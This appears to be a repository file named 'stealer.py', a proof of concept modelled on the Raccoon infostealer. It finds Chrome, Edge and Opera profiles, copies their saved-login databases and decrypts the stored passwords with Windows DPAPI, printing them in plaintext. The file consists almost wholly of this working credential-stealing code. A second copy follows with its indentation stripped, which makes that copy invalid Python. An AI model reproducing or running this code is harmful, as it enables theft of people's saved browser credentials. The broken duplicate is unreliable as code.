justaguywhocodes/stealer.py

## stealer.py
# raccoon_browser_steal_poc.py
import os
import sqlite3
import shutil
from win32crypt import CryptUnprotectData   # pip install pywin32

def find_browser_paths():
    paths = [
        os.path.expandvars(r"%LOCALAPPDATA%\Google\Chrome\User Data\Default"),
        os.path.expandvars(r"%LOCALAPPDATA%\Microsoft\Edge\User Data\Default"),
        os.path.expandvars(r"%APPDATA%\Opera Software\Opera Stable"),
        os.path.expandvars(r"%APPDATA%\Opera Software\Opera GX Stable"),
    ]
    # Also recursive search for any folder containing "pera" (Opera)
    for root, dirs, files in os.walk(os.path.expandvars(r"%APPDATA%")):
        if "pera" in root.lower():
            paths.append(root)
    return [p for p in paths if os.path.exists(p)]

def extract_logins(db_path):
    tmp_db = f"temp_{os.getpid()}.db"
    shutil.copy2(db_path, tmp_db)
    conn = sqlite3.connect(tmp_db)
    cursor = conn.cursor()
    cursor.execute("SELECT origin_url, username_value, password_value FROM logins")

    for row in cursor.fetchall():
        print(row)
        url, username, encrypted_password = row
        if encrypted_password:
            try:
                password = CryptUnprotectData(encrypted_password, None, None, None, 0)[1].decode()
                print(f"[+] {url} | {username} : {password}")
            except:
                pass
    conn.close()
    os.remove(tmp_db)

for profile in find_browser_paths():
    login_db = os.path.join(profile, "Login Data")
    if os.path.exists(login_db):
        print(f"[*] Extracting from {login_db}")
        extract_logins(login_db)
	# raccoon_browser_steal_poc.py
	import os
	import sqlite3
	import shutil
	from win32crypt import CryptUnprotectData # pip install pywin32

	def find_browser_paths():
	paths = [
	os.path.expandvars(r"%LOCALAPPDATA%\Google\Chrome\User Data\Default"),
	os.path.expandvars(r"%LOCALAPPDATA%\Microsoft\Edge\User Data\Default"),
	os.path.expandvars(r"%APPDATA%\Opera Software\Opera Stable"),
	os.path.expandvars(r"%APPDATA%\Opera Software\Opera GX Stable"),
	]
	# Also recursive search for any folder containing "pera" (Opera)
	for root, dirs, files in os.walk(os.path.expandvars(r"%APPDATA%")):
	if "pera" in root.lower():
	paths.append(root)
	return [p for p in paths if os.path.exists(p)]

	def extract_logins(db_path):
	tmp_db = f"temp_{os.getpid()}.db"
	shutil.copy2(db_path, tmp_db)
	conn = sqlite3.connect(tmp_db)
	cursor = conn.cursor()
	cursor.execute("SELECT origin_url, username_value, password_value FROM logins")

	for row in cursor.fetchall():
	print(row)
	url, username, encrypted_password = row
	if encrypted_password:
	try:
	password = CryptUnprotectData(encrypted_password, None, None, None, 0)[1].decode()
	print(f"[+] {url} \| {username} : {password}")
	except:
	pass
	conn.close()
	os.remove(tmp_db)

	for profile in find_browser_paths():
	login_db = os.path.join(profile, "Login Data")
	if os.path.exists(login_db):
	print(f"[*] Extracting from {login_db}")
	extract_logins(login_db)
No results found